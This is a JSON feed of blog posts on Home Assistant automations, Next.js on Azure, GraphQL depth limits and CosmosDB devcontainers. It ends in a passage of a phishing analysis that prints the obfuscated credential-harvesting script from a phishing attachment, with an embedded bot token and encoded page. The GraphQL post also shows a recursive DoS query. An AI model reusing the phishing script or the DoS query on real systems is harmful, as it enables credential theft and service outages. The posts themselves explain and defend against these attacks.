I got the card idea from Tatham and it’s using the https://github.com/thomasloven/lovelace-template-entity-row custom card.\nHere’s the YAML for the card:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 type: entities entities: - type: custom:template-entity-row entity: sensor.next_collection name: "{{ states.sensor.next_collection.state }}" state: |- {% set days_to = state_attr('sensor.next_collection', 'daysTo') %} {% if days_to == 0 %} Today {% elif days_to == 1 %} Out Tonight {% elif days_to <= 7 %} {{ (now() + timedelta(days = days_to)).strftime('%A') }} {% else %} in {{days_to}} days {% endif %} active: "{{ states.sensor.next_collection.attributes.daysTo <= 1 }}" icon: mdi:trash-can-outline - entity: sensor.next_garden_collection type: custom:template-entity-row name: Green bin condition: "{{ states.sensor.next_garden_collection.attributes.daysTo <= 7 }}" - entity: sensor.next_recycling_collection type: custom:template-entity-row name: Yellow condition: "{{ states.sensor.next_recycling_collection.attributes.daysTo <= 7 }}" - entity: sensor.next_rubbish_collection type: custom:template-entity-row name: Red bin theme: minimalist-desktop The top is a template that looks works out how long is left and shows a friendly description for when the next collection is, and then I show more details such as which bins there are.\nI’m also using a custom sensor for next_collection which computes from the calendar info:\n1 2 3 4 5 - platform: waste_collection_schedule name: next_collection add_days_to: true details_format: generic value_template: '{{value.types | join(", ")}}' Automations I currently have a single automation that does a broadcast message the day that the bins are due to go out:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 - id: "bin_day" alias: "Reminder: Bins" description: "" trigger: - platform: time at: 08:00:00 condition: - condition: time weekday: - thu action: - service: tts.google_translate_say data: entity_id: media_player.nestaudio0935 message: Today's bins are {{ states.sensor.next_collection.state }} mode: single I should probably update the automation to use something from the HACS component rather than hard-coding thu as the day, but that’ll come if they change my day of pickup.\nI’ve contemplated having something that does an additional reminder if the bins aren’t put out in time, maybe have some presence sensor on the bin and check their location, but I’m not sure if that’s worth the effort, plus this was more to know if it’s yellow or green bin day, not to remind me to put them out (I’m pretty good on that front).\nConclusion I’m pretty happy with how this turned out, it was a fun to do some reverse engineering of the mobile app and figure out how to get the data. 
I’m also happy that I was able to contribute to the HACS component, so hopefully it’ll be useful to others.\nI think there’s more I could do from a dashboard level to make it more useful, but I’m happy with what I’ve got for now.\nIf you’re doing something similar, I’d love to hear about it, so please let me know in the comments!\n", "id": "2022-11-07-building-a-smart-home---part-5-bin-day" }, { "title": "Building a Smart Home - Part 4 Ceiling Fans", "url": "https://www.aaron-powell.com/posts/2022-10-24-building-a-smart-home-part-4-ceiling-fans/", "date": "Mon, 24 Oct 2022 04:25:19 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "It's starting to get warm in Sydney, let's get the ceiling fans working with Home Assistant", "content": "When we designed our new home, we decided to add ceiling fans to each of the bedrooms, mostly because, while we have a HVAC system in place that is ducted throughout the house, sometimes you just want some basic air movement in a room, especially when it’s humid but not hot, and a HVAC is a lot more expensive to run than a ceiling fan.\nBut, ceiling fans tend to be pretty dumb, and I wanted to look at how to integrate them into my smart home, so let’s take a look at that today. We installed fans from Lucci Air (I’m not sure the exact model) and they have a remote control, so I’ll be looking at that style of fan. If you’ve got something else, maybe some of the ideas here will resonate, but I can’t guarantee it.\nBut first…\nCeiling fans are great example of terrible UX In the first post of this series I brought up the topic of Norman Doors, a term used to describe something that doesn’t work the way you’d expect it, and for me, they are the perfect example of how something can be wrong in a smart home.\nTake the remote controlled ceiling fan. I have a switch on the wall that when I flip it, the state of the light changes. Great, that’s to be expected. And I have a remote that I can use while laying in bed and way to turn the fan on. Again, great… except it’s not.\nIt turns out that these fans (and we had a different Lucci module at the place we rented) are a broken UX design. You see, the switch on the wall isn’t changing the state of the light per se, it’s changing the power state of the circuit, and it just so happens that the fan remembers it’s last state (and the default last state when they were installed is “light is on”). So, if I flip the switch the circuit either has power or doesn’t, and when it has power, the remote can be used to control the fan speed or turn the light off, but when it doesn’t have power, the remote can’t do anything. This manifested itself as a problem in the rental as we’d go to bed, but then want the fan on in the middle of the night, but to do that you flip the switch, light up the room and then quickly hit the “turn light off” button… hopefully without waking the other sleeping person in the room.\nSee, broken UX.\nSo you can address this by removing the switch all together and now it’s just remote controlled, but again, you’ve broken your UX. When someone walks into the room they expect a switch, but it’s not visible, and now you’re left explaining “so, you have to find the remote first, then use that to…” and invariably, one of the kids has hidden the remote.\nThis is a perfect example of everything that can go wrong when you try to make something “smart”. 
Sure, a remote isn’t a “smart home device” but in this case it’s filling the role and doing so in a way that means you have to constantly “train” people on how to use a room, which is not what you should want.\nOk, complaining done, back to the blog post.\nCeiling fan remote control Given that we have a remote that is used to control the fan functions, it stands to reason that it’s using some signal to communicate with the fan, and that signal is probably using some sort of RF protocol (I’m not sure what frequency this one uses, but knowing it is not required for the solution). And if it’s something being broadcast, well, we can simulate that broadcast right?\nFor that, I decided to use the Broadlink RM4 Pro, which is capable of broadcasting RF and IR signals. I was already using one of these at the rental to blast IR as the reverse cycle AC unit (as I couldn’t be bother replacing the batteries 🤣), so it seemed like a decent enough starting point. Also, there’s a Broadlink integration for Home Assistant which makes it easy to control the device. And for a bonus, the Broadlink device works on local control, so you don’t need to have it connected to the internet to use it.\nOnce the device was provisioned and integrated into Home Assistant, it was ready to get going.\nTeaching the Broadlink As the RM4 is an RF blaster and doesn’t know anything about my fan, I need to train it up, and thankfully, that’s something we can do from Home Assistant.\nNavigate to Developer Tools -> Services and from the service options, you’ll find a remote.learn_command service to execute. This will set the device into learning mode and it’ll pickup any signals we send to it:\n1 2 3 4 5 6 7 service: remote.learn_command data: device: parents_fan command: light command_type: rf target: entity_id: remote.broadlink_rm4_pro The fields of relevance here are:\ndevice - This is the name of the device (aka remote) we’re teaching the Broadlink about. This is just a name, so you can call it whatever you want, but it’s a good idea to make it descriptive. command - This is the name of the command we’re teaching the Broadlink about. This is also just a name, but again, it’s a good idea to make it descriptive. entity_id - This is the Home Assistant entity ID of the Broadlink device we’re teaching. Click the Call Service button and the device will start listening (the indicator light will turn orange), and now we’re ready to go.\nNote: The Call Service button will turn green after a few seconds, but I didn’t find I’d need to wait for it.\nWhile the device is in listening mode, press the button on the remote you want to teach (I found I’d have to hold it down for ~10 seconds), and then when released the indicator light will go off, then turn back on as orange, indicating it’s in learning mode again (or still… I’m not sure). Once it’s back to orange, press the button on the remote again, this time you don’t have to do a long press, the indicator light will turn off, and your remote code is learnt.\nIf you want to verify this, open the your file editor extension (VS Code or File Editor) and navigate to the .storage folder. In there, you’ll find a file named broadlink_remote_<id>_codes. 
If you open it you’ll see this:\n1 2 3 4 5 6 7 8 9 10 { "version": 1, "minor_version": 1, "key": "broadlink_remote_<id>_codes", "data": { "parents_fan": { "light": "<some long code here>" } } } This is where you’ll find the commands that have been learnt, and is a handy reference if you’re like me and forget what they are called.\nRepeat the above steps for each of the buttons on the remote you want to learn.\nTesting a command Once you’ve learnt a command, you can test it by executing the remote.send_command service:\n1 2 3 4 5 6 service: remote.send_command data: device: parents_fan command: light target: entity_id: remote.broadlink_rm4_pro We have a light that goes on and off, woo!\nMaking our fan With the commands learnt, it’s time to make a fan in Home Assistant that we can control, but since this is going to be a completely virtual fan, we have no physical indicators of state, I’m going to create some helpers to track state for us.\n1 2 3 4 5 6 7 8 9 10 11 12 input_boolean: parents_fan_state: name: "Parents Bedroom: Fan state" icon: mdi:fan input_number: parents_fan_speed: name: Parents fan speed icon: mdi:fan step: 1 min: 0 max: 6 mode: slider The input_boolean is really just tracking if the fan is on or off, and we could probably do that as a calculated value (we’ll see why shortly), but I like to be explicit and it’s not really any overhead. As for the input_number, this is tracking the speed of the fan. My fan has six speeds, but I’ve added a seventh position, 0, which I’m using to indicate off (hence why we could do a calculated value rather than explicit boolean state).\nSince I’ve got four fans in the house, I’m going to use a series of scripts to execute the commands, as I find they are a bit more portable and discoverable - plus I can reuse them outside of the fan entity itself:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 script: fan_off: alias: Turn a fan off fields: fan: description: The fan to turn off example: parents_fan sequence: - service: input_number.set_value data: entity_id: input_number.{{ fan }}_speed value: 0 mode: single icon: mdi:fan-off fan_on: alias: Turn a fan on fields: fan: description: The fan to turn on example: parents_fan sequence: - service: input_number.set_value data: entity_id: input_number.{{ fan }}_speed value: 1 mode: single icon: mdi:fan-speed-1 These scripts are really just wrappers for the specific state, for the off I set the input_number helper to 0, and the way I know which helper to use is by having a convention to the name of the entities, fan is going to be the device name when we learnt the commands, making it quite easy to have reusable scripts.\nNext, let’s create a script to set the speed:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 fan_set_speed: alias: Set the speed of a fan icon: mdi:fan fields: fan: description: The fan to set the speed of example: parents_fan speed: description: The speed of the fan example: "1" sequence: - service: remote.send_command data: device: "{{ fan }}" command: fan_speed_{{ speed | round (0, 'floor') }} target: entity_id: remote.broadlink_rm4_pro - if: - condition: template value_template: "{{ (speed | round (0, 'floor')) == 0 }}" then: - service: input_boolean.turn_off data: entity_id: input_boolean.{{ fan }}_state else: - service: input_boolean.turn_on data: entity_id: input_boolean.{{ fan }}_state - service: input_number.set_value data: entity_id: input_number.{{ fan }}_speed value: "{{ speed }}" mode: single This script 
will be callable from other scripts and automations and will take two inputs, the fan (which is the device name) and the speed to set. It will then send the command to the Broadlink using the remote.send_command service (like in our testing) and since I suffixed the command names with the speed, we can pull that out nicely, and then we set the on/off state of the fan before updating the input_number helper with the requested speed.\nThe fan entity With our scripts and helpers set up, we can create a fan using the Template Fan integration:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 fan: - platform: template fans: parents_fan: friendly_name: Parents Fan unique_id: parents_fan speed_count: 6 value_template: "{{ states('input_boolean.parents_fan_state') }}" percentage_template: "{{ (100 * (int(states('input_number.parents_fan_speed'))/6)) | round(0, 'floor') }}" turn_off: service: script.fan_off data: fan: parents_fan turn_on: service: script.fan_on data: fan: parents_fan set_percentage: service: script.fan_set_speed_state data: fan: parents_fan speed: "{{ percentage }}" There’s some metadata for the fan, such as the name and entity ID, but then we start computing some values from the helpers we defined above. The value_template will read the state from the input_boolean (and here’s where we could compute it if desired) and then percentage_template is used to turn the speed into a percentage to display on the slider. Since we’re storing the numerical speed (as that maps more cleanly to our commands), we need to convert it to a percentage, and I just round it down since sixths isn’t a clean round fraction.\nAdding the turn_on and turn_off actions is easy, they’ll just call the scripts we set up, but the set_percentage is going to require a new script (to avoid the calculations being embedded in the entity):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 fan_set_speed_state: alias: Set the tracking value for the fan speed icon: mdi:fan fields: fan: description: The fan to set the speed of example: parents_fan speed: description: The speed of the fan example: "1" sequence: service: input_number.set_value data: entity_id: input_number.{{ fan }}_speed value: "{{ ((speed / 100) * 6) | round(0, 'ceil') }}" This script is a generic version of the on/off scripts: it takes the percentage value, converts it to a speed value, and then sets the helper.
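As a worked example of that round trip, take speed 2 of 6 using the templates above:

  # displaying: percentage_template -> (100 * (2 / 6)) rounded down = 33
  # setting: fan_set_speed_state -> ((33 / 100) * 6) = 1.98, rounded up = 2

Rounding down when displaying and up when setting means each of the six speeds survives the trip through a percentage.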
Having to deal with percentages, especially in my case of numbers that don’t round cleanly, is a bit of a pain, but it’s the best I could come up with.\nAnd with all that set up, we can add it to our UI (I’m using the mushroom cards add-on for the fan card):\nWe’re almost done, but there’s one thing still missing: nothing actually calls fan_set_speed yet, as all we’re doing is setting the input_number helper.\nThe automation To call our script, I’m using an automation that is set to trigger on the input_number changing:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 automation: - id: set_fan_speed alias: "Climate: Set fan speed" trigger: - platform: state entity_id: - input_number.parents_fan_speed action: - service: script.fan_set_speed data: fan: "{{ fan }}" speed: "{{ states(trigger.entity_id) }}" variables: fan: "{{ trigger.entity_id | regex_replace(find='input_number.', replace='', ignorecase=False) | regex_replace(find='_speed', replace='', ignorecase=False) }}" As I integrate more of the fans, I’ll add more of them to the entity_id on the trigger, but we’re starting simple.\nSince we’re going to need the name of the fan for the script, and I was smart enough to put that in the name of the input_number, we can use a regex to pull it from trigger.entity_id (for example, input_number.parents_fan_speed becomes parents_fan) and then pass it to the script, while grabbing the state (i.e. the numerical speed) from the entity that triggered the automation.\nAside: In retrospect, I should have had the device as the suffix of the input_number, rather than in the middle of the entity name, but now I’ve got it everywhere and I’m too lazy to go back and change it.\nNow, whenever something triggers a change to the fan speed value, this automation runs, the script is called and the fan does its thing. So far, I’ve set this up with some other automations based on the temperature and humidity in the room, as well as a custom Google Assistant routine so I can say “Hey Google, parents fan speed” and it goes faster!\nConclusion I’m pretty happy with how this turned out, especially since I find the “default” UX of these fans really frustrating. In fact, we don’t even have the remotes anywhere in the rooms, they just sit in the downstairs “junk drawer” (you know the one!).\nIt’s not a perfect solution though, as it doesn’t completely address the core issue of poor UX: the switch on the wall will still break the circuit, and I can’t track that, so the state can get out of sync. We’ve had a few incidents where my wife or kids couldn’t turn on the fan’s light because the switch on the wall was off - it didn’t respond to a voice command, so they flipped the switch, which just killed the circuit power and left the state in Home Assistant out of sync. I’ve got some ideas on how to address that, but I’m waiting for the hardware to arrive before I can try them out.\nBut from an automated house perspective, it works well. We’ve had some humid nights recently and it’s been nice to come to bed to find that the fan is already spinning and we didn’t have to do anything. 
I’ve also got the light in the fan (which uses the Light Template entity) configured with an automation against the kids lamps, so when we enable the “Night light” effect on them, it’ll turn off the overhead light - and it’s worked about 90% of the time 🤣.\nIf anyone has thoughts on how to improve this, or any other ways they’ve gone about integrating remote controlled ceiling fans, I’d be keen to hear about it!\n", "id": "2022-10-24-building-a-smart-home-part-4-ceiling-fans" }, { "title": "Extending Next.js Support in Azure Static Web Apps", "url": "https://www.aaron-powell.com/posts/2022-10-10-extending-nextjs-support-in-azure-static-web-apps/", "date": "Mon, 10 Oct 2022 06:40:28 +0000", "tags": [ "azure", "javascript", "serverless" ], "description": "We're improving the support for Next.js on Azure Static Web Apps, check out what's new!", "content": "Next.js is one of the most popular JavaScript frameworks for building complex, server-driven React applications, combining the features that make React a useful UI library with server-side rendering, built-in API support and SEO optimizations.\nWith today’s preview release, we’re improving support for Next.js on Azure Static Web Apps.\nWhat’s new In this preview we’re focusing on making zero-config deployments with Next.js even easier than it’s been before by including support for Server-Side Rendering and Incremental Static Regeneration (SSR and ISR respectively), API Routes, advanced image compression, and Next.js Auth. In this post, we want to highlight three features that make building Next.js apps on Azure more powerful.\nServer-Side Rendering When we first launched Static Web Apps, we ensured we had support for Next.js, but our focus on this was Static-Site Generation or SSG. SSG takes the application and compiles static HTML from it that is then served and while SSG is useful in some scenarios it doesn’t support dynamic updates to the content of the page per request.\nThis is where Server-Side Rendering, or SSR, comes in. With SSR you can inject data from a backend data source before the HTML is sent to the client, aka in the pre-rendering phase, allowing for more contextual, real-time updates to the data. Check out Next.js’s docs for more on SSR.\nFor this demo we’ll add a getServerSideProps function to our index.js file that has the current timestamp:\n1 2 3 4 export async function getServerSideProps() { const data = JSON.stringify({ time: new Date() }); return { props: { data } }; } We can then consume this in the component:\n1 2 3 export default function Home({ data }) { const serverData = JSON.parse(data); // snip And then output the date timestamp.\nAPI routes API routes allow us to build a backend API for the client-side components of our Next.js app to communicate with and get data from other systems. These are added to a project by creating an api folder within our Next.js app and defining JavaScript (or TypeScript) files with exported functions that Next.js will turn into APIs that can be called to return JSON to the client.\nAPI routes can be as simple as masking an external service, or as complex as hosting a GraphQL server, which we’re doing in the example below.\nHere you’ll see that we called the API route, /graphql, and got back a GraphQL payload response. You’ll find this sample on GitHub.\nImage optimisation When it comes to ensuring your website is optimized for all web clients, Web Vitals is a valuable measure. To help with this Next.js has an Image component and image optimisation. 
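If you haven’t used it before, the component is essentially a drop-in replacement for an <img> tag - a minimal sketch (the file name and dimensions here are made up for the example):
import Image from "next/image";

export default function Hero() {
  return <Image src="/hero.png" alt="A hero banner" width={1200} height={600} />;
}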
The Image component also makes it easier to create responsive images on your website, optimising the image sent to the browser based on the dimensions of the viewport and whether the image is currently visible or not.\nYou can see this in action where we have deployed the Next.js image example.\nDeploying with the new Next.js support When it comes to deploying an application to leverage these Next.js features, you need to select Next.js from the Build Presets and leave the rest of the options as their default, as SSR Next.js applications are the default for Static Web Apps. If you wish to use Next.js as a Static Site Generator, you’ll need to add the environment variable is_static_export to your deployment pipeline, set it to true, and set the output location to out.\nCommon Questions Can I still use SSG? Yes! Static rendered Next.js applications are still supported on Static Web Apps, and we encourage you to keep using them if they are the right model for your applications.\nExisting Next.js SSG sites should be unaffected by the launch today, although it is encouraged that you add the is_static_export environment flag to your deployment pipeline, ensuring that Static Web Apps correctly identifies the site as SSG.\nShould I use SSR over SSG? This is very much an it depends answer. The support announced today for SSR is preview support, meaning that it is not recommended for production workloads; for production we still encourage people to use SSG as their preferred model when working with Next.js. This also echoes the recommendation from Next.js themselves that SSG should be the preferred model when publishing sites.\nSSG sites have a performance benefit over SSR, as the HTML files are created at build time rather than runtime, meaning there is less work for the server to do when producing content, thus increasing performance.\nBut if you’re looking to use features like dynamic routing, have a very large site with hundreds (or thousands) of pages, or want to fetch data before sending it to the client, SSR will be a better fit for you and worth exploring.\nIf you’re still unsure which approach to use, check out this excellent guide from Next.js themselves.\nCan I use Azure Functions or BYO Backends as well as API routes? No, if you’re deploying a hybrid Next.js application then no additional backend will be available for the site, as API routes can be used to achieve much of the same functionality.\nNext steps This is all exciting, and if you’re like me and can’t wait to try out the new features, check out the sample repo from this post then head on over to our documentation and get started with your next Next.js application today.\n", "id": "2022-10-10-extending-nextjs-support-in-azure-static-web-apps" }, { "title": "GraphQL on Azure: Part 11 - Avoiding DoS Queries", "url": "https://www.aaron-powell.com/posts/2022-10-10-graphql-on-azure-part-11-avoiding-dos-queries/", "date": "Mon, 10 Oct 2022 00:42:25 +0000", "tags": [ "azure", "graphql" ], "description": "Graphs are great for DoS queries, so how can we prevent them?", "content": "In the previous post in this series we added a new “virtual” field to our GraphQL schema for Post, related:\n1 2 3 4 5 6 7 8 9 10 type Post { id: ID! title: String! url: Url! date: Date tags: [String!]! description: String content: String! related(tag: String): [Post!] 
} But in doing so, we added a problem. Let’s take this query as an example:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 query { posts { related { related { related { related { related { related { related { related { title } } } } } } } } } } Oh dear… What’s going to happen here? Exactly what you think: a series of recursive queries against my API, and I’ve just created a Denial of Service, DoS, attack vector against my server (it’s not a DDoS attack since it’s not distributed).\nBut this is perfectly valid from a GraphQL standpoint, it’s just walking the graph which we told it to expose, but I didn’t want it to bring down my server! And while this is a single type GraphQL schema, it’s realistic that in a more complex schema you’ll have types that can recurse through other types back to the original.\nAzure API Management GraphQL policies Good news, we can solve this ourselves by leveraging APIM policies, this time we’ll use the <validate-graphql-request> policy.\nThis policy is an inbound policy, which means that it’ll be applied before the request is passed to our backend, or in this case, the GraphQL resolver policies, allowing us to intercept and, well, validate it against rules we’ve predefined.\nWe’re going to focus on the two top-level attributes of the policy, max-size and max-depth.\nThe max-size attribute is used to enforce an inbound request size limit - say, reject any request over 100kb - so that you are limiting the amount of data that can be retrieved in a single request, as an excessive query size may result in an excessive database operation being performed.\nWe’ll add this to the <inbound> section of our APIM policy:\n1 2 3 4 5 6 7 <policies> <inbound> <base /> <validate-graphql-request error-variable-name="size" max-size="10240" /> </inbound> <!-- snip --> </policies> This is a useful policy to have in place, especially if you have a large GraphQL schema that exposes a lot of different types and fields, but it’s not really going to solve our problem - it’d take quite a lot of nesting to hit the size cap. Instead, we want to use the max-depth part of the policy.\nWith max-depth, we can specify how many levels of nesting a request is allowed to do before we reject the query, so let’s update the policy:\n1 2 3 4 5 6 7 <policies> <inbound> <base /> <validate-graphql-request error-variable-name="size" max-size="10240" max-depth="3" /> </inbound> <!-- snip --> </policies> One thing to be aware of with max-depth is that it’s using a 1-based index, starting with the GraphQL operation type (query or mutation), meaning that a depth of 3 would allow this:\n1 2 3 4 5 6 7 8 query { postsByTag(tag: "graphql") { title related { title } } } But this query is invalid:\n1 2 3 4 5 6 7 8 9 10 11 query { postsByTag(tag: "graphql") { title related { title related { title } } } } And if you execute the query above it’ll give you a 400 Bad Request status, with the following body:\n1 2 3 4 { "statusCode": 400, "message": "The query is too nested to execute, its depth is more than 3 " } Success! 
We’ve created a block at the gateway level, meaning that we don’t even need to worry about the downstream servers being hit by rogue queries.\nConclusion One of the easy-to-overlook aspects of GraphQL is that you’re working with a graph, and you can make recursive references in the graph that can be walked, and exploited, resulting in a DoS attack vector against your backend.\nBut it’s something that we can easily handle with the GraphQL policies in Azure API Management.\nUsing the max-depth part of the <validate-graphql-request> policy will allow us to prevent excessive nesting in the operation performed by a client, and we can combine that with the max-size attribute to avoid large, flat requests.\nThere are other rules that we can set on the policy, such as restricting access to certain resolver fields or paths, but I’ll leave that as an exercise for the reader. 😉\n", "id": "2022-10-10-graphql-on-azure-part-11-avoiding-dos-queries" }, { "title": "Improved Local Dev With CosmosDB and devcontainers", "url": "https://www.aaron-powell.com/posts/2022-08-24-improved-local-dev-with-cosmosdb-and-devcontainers/", "date": "Wed, 24 Aug 2022 00:22:27 +0000", "tags": [ "javascript", "vscode", "cosmosdb" ], "description": "A second take on how to work with CosmosDB's docker-based emulator", "content": "Last year I wrote a post on using the CosmosDB Docker-based emulator with devcontainers and since then I’ve used that pattern many times to build applications, but there was one thing that kept bothering me: having to disable SSL for Node.js.\nSure, disabling SSL with NODE_TLS_REJECT_UNAUTHORIZED wasn’t a huge pain, but it did feel like a dirty little workaround, and it also hit a snag - dotnet projects.\nI had the idea that I should add the CosmosDB emulator to the devcontainer used by FSharp.CosmosDb, as I kept deleting the Azure resource I used between stints of working on it. But when I’d set the account host to https://cosmos:8081 for the connection string, it’d fail to do queries as the self-signed certificate was rejected.\nI guess it’s time to install the certificate.\nThe emulator provides the certificate at a well-known endpoint, which you can get using cURL:\n1 curl -k https://$ipaddr:8081/_explorer/emulator.pem > emulatorcert.crt But when should we run that, and what’s the IP of the Cosmos emulator container?\nInstalling the certificate Because we need to wait until the containers have started, we’ll use the postCreateCommand in the devcontainer.json file, and we’ll have it call a bash script (the devcontainer.json side of this is sketched a little further down). Here’s the bash script:\n1 2 3 4 5 6 7 8 9 10 11 12 13 #!/usr/bin/env bash set -euxo pipefail ipAddress=https://$(docker inspect cosmos -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}'):8081 # Try to get the emulator cert in a loop until sudo curl -ksf "${ipAddress}/_explorer/emulator.pem" -o '/usr/local/share/ca-certificates/emulator.crt'; do echo "Downloading cert from $ipAddress" sleep 1 done sudo update-ca-certificates To get the IP of the emulator, we use docker inspect, and in the docker-compose file I set a name for the container, cosmos, so that it’s a well-known name (we could guess the name based on the way compose names containers, but this is safest), and we provide a template to grab the IP from the JSON response - {{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}. 
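For reference, the devcontainer.json wiring is just pointing postCreateCommand at wherever you save that script - something like this (the script path here is a placeholder, use whatever you name the file):
{
  // run the cert install script once the containers are up
  "postCreateCommand": "bash .devcontainer/install-cosmos-cert.sh"
}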
That IP is combined with the protocol/port information to make the variable used to then download and install the certificate as described here.\nSetting the connection info With the certificate installed, it might be convenient to set the connection string information so that it can be used. Initially, I thought to use environment variables (since we have the IP as a bash variable) and load them with the Microsoft.Extensions.Configuration.EnvironmentVariables NuGet package, so we could add an export ipAddress to the end of the bash script (or maybe make the variable something easier to parse into the dotnet config system), but it turns out that you can’t export variables from postCreateCommands (see this issue).\nSince that was off the table, an alternative solution would be to dump the info out as a file on disk. Here’s the dotnet approach for my project; you just have to adapt the file (and its contents) to your project’s needs:\n1 2 3 4 if [ ! -f ./samples/FSharp.CosmosDb.Samples/appsettings.Development.json ] then echo '{ "Cosmos": { "EndPoint" : "'$ipAddress'" } }' >> ./samples/FSharp.CosmosDb.Samples/appsettings.Development.json fi Note: I have the Access Key for cosmos in the docker-compose file, but you could also dump it out here if you prefer.\nAnd with that, when the container starts, the connection to Cosmos is ready for your application to use.\nSummary In this post we’ve seen how we can run the Docker CosmosDB emulator side-by-side with our app container using a VS Code devcontainer. The full definitions that I published for my project can be found here.\nNow that I’ve figured out how to do this, I’m going to be going back and retrofitting some other repos so that I don’t have to disable SSL validation for Node.js apps, making it more secure to run them locally.\nAddendum After writing this post and going back to some JavaScript/Node.js projects, I found that they were still failing with an invalid certificate, and it turns out that if I’d read the docs fully I’d have known this. 
It seems that while dotnet applications running on Linux respect the certificate store, Node.js apps don’t, so you need to explicitly add the certificate using the NODE_EXTRA_CA_CERTS environment variable, so I’ve added "NODE_EXTRA_CA_CERTS": "/usr/local/share/ca-certificates/emulator.crt" to the remoteEnv section of the devcontainer.json file… sigh.\n", "id": "2022-08-24-improved-local-dev-with-cosmosdb-and-devcontainers" }, { "title": "More Phishing Attempts", "url": "https://www.aaron-powell.com/posts/2022-08-23-more-phishing-attempts/", "date": "Tue, 23 Aug 2022 00:31:33 +0000", "tags": [ "security" ], "description": "Another day, another phish", "content": "Well, that was quick, less than a week since my last one and here we go again.\nFor transparency, this one did actually land in my junk mail, so I wouldn’t have seen it if I hadn’t been looking for an email that I should’ve received (totally unrelated to getting phished though 🤣), but since I did see it, it’s time to dig into it again!\nThe premise of this one is the same as the last one, although the email was much more brief, only containing my email address in the body and the HTML file attachment.\nSpeaking of the HTML, it was a bit different this time:\n1 <script>var e\\u006dail="<yes, my email was here>";var tok\\u0065\\u006e='5\\x374\\062\\u0038\\0607394\\u003a\\u0041AEY\\171\\x56gRLp3\\132YYweU\\161\\144cbUdsGWj\\163\\x6e-\\x53k\\063w\\u0030';var c\\u0068a\\u0074\\u005fid=5486255038;var d\\u0061ta=ato\\u0062("PC\\x46\\105T0\\x4eUWV\\102\\106IGh0bWw+Cjxod\\x471sIGRp\\143\\x6a0ibHRyIiBjbGFzc\\x7a0iI\\x69B\\x73\\131W\\x35nPSJlb\\u0069I\\053CiAg\\111C\\x41\\x38a\\107VhZD4KIC\\x41g\\u0049DxtZXRh\\111Gh\\x30dHAt\\132XF1aXY9I\\153NvbnR\\x6cbnQtVHlw\\132\\123Ig\\u005929udGVudD0i\\144G\\x564\\u0064C9od\\x47\\u0031sOy\\u0042\\152aG\\106y\\x632V0PVVURi04I\\x6a4\\x4bICAgID\\u0078\\x30a\\u0058RsZ\\x545\\124\\141Wdu\\111Gl\\x75\\u0049HR\\166\\x49H\\154v\\144XI\\x67YWNj\\1423Vu\\x64DwvdG\\u006c0bGU+C\\x69\\x41gICA8bWV0YSB\\x6fd\\x48Rw\\114\\127\\126\\170dWl2PS\\x4a\\u0059\\114VVBL\\x55N\\166\\x62X\\x42hdG\\x6c\\151bGUiIGNvb\\x6e\\122\\u006c\\u0062nQ9I\\x6b\\154FPW\\x56\\x6bZ2U\\151Pg\\157gICAg\\120G1ldG\\x45\\147\\u0062m\\u0046\\x74\\x5aT\\u0030idmlld3B\\u0076cn\\u0051iIG\\u004ev\\x62n\\x52\\x6cbnQ9\\x49n\\144\\160ZHRo\\u0050WR\\154\\x64\\x6d\\154jZS13aW\\122\\x30aC\\167gaW\\x35p\\144\\x47lhbC1z\\x592FsZT0x\\x4cj\\x41s\\x49G\\u0031\\150eG\\u006ct\\144W0\\x74c2NhbGU9M\\1514\\167\\u004cCB1\\x632VyLXN\\u006aYW\\170\\u0068Y\\155x\\154PXllcy\\111\\x2bCi\\x41gICA\\u0038c\\u0032Ny\\x61X\\u00420IHNyY\\u007a\\u0030\\151a\\110\\x520cHM6Ly9ha\\x6d\\1064Lm\\144vb\\u0032d\\163ZW\\106wa\\130M\\165Y29tL2FqYX\\u0067vbG\\154icy9qcX\\u0056\\154\\143n\\u006bv\\115y40\\114j\\x45vanF1\\x5a\\x58J\\u0035Lm\\061\\160b\\u00695\\x71\\x63\\u0079I\\u002bPC\\071zY3J\\x70cHQ+\\u0043iA\\x67\\111C\\x418bG\\x6cuayByZWw\\u0039\\111\\x6e\\u004eob\\063J\\060Y\\063V0IGlj\\1422\\x34i\\111Ghy\\132WY9Imh0\\144HBzOi\\u0038vY\\x57F\\153\\x59\\u0032Ru\\114m1\\u007aZn\\x52h\\144\\130R\\157L\\1555l\\u0064C\\x39z\\141GFyZW\\121v\\u004dS4\\u0077\\x4c2Nvb\\x6eR\\154bnQva\\x57\\061\\x68Z\\062VzL\\x32Zh\\x64ml\\u006a\\u00622\\065fYV9l\\x64XBh\\u0065WZnZ2hx\\141\\x57FpN\\062s5c29\\x73\\116\\155\\170\\x6e\\u004di5\\x70Y\\062\\070\\151\\120iA\\x67\\u0049C\\x41KIC\\x41\\147\\111D\\170saW5\\x72I\\x47\\122hdG\\105tbG\\071hZ\\u0047\\u0056yPSJj\\132\\1074iIGNyb3Nzb3J\\160Z2l\\165PS\\112hbm9u\\u0065W1vdXMiIGh\\u0079\\x5a\\x57Y9Imh\\x30\\144HBz\\117i8vYW\\x46\\153Y\\062R\\165Lm1zZn\\x52h\\x64XRoL\\
